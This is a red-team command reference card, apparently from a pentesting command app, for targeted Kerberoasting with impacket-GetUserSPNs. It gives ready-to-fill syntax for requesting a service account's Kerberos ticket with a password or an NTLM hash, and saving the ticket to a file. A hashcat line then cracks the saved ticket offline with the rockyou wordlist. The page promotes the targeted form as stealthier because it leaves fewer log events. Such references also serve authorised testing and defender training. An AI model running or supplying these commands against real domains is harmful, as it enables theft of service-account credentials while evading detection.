Impacket Targeted Kerberoast

Request a TGS only for a specific service account instead of every kerberoastable user in the domain. Stealthier (one ticket request, one event) and useful when you already know the high-value SPN you care about.

Tool
impacket-GetUserSPNs
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
KERBEROS, LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-GetUserSPNs -request-user <target_user> -dc-ip <dc-ip> '<domain>/<user>:<password>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-GetUserSPNs -request-user <target_user> -hashes ':<hash>' -dc-ip <dc-ip> '<domain>/<user>'

Output to File requires password

impacket-GetUserSPNs -request-user <target_user> -dc-ip <dc-ip> '<domain>/<user>:<password>' -outputfile kerb.txt

Examples

impacket-GetUserSPNs -request-user sqlsvc -dc-ip 10.10.10.10 'CORP/jdoe:Password123!'
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

Tags

impacket kerberoast spn tgs targeted stealth

References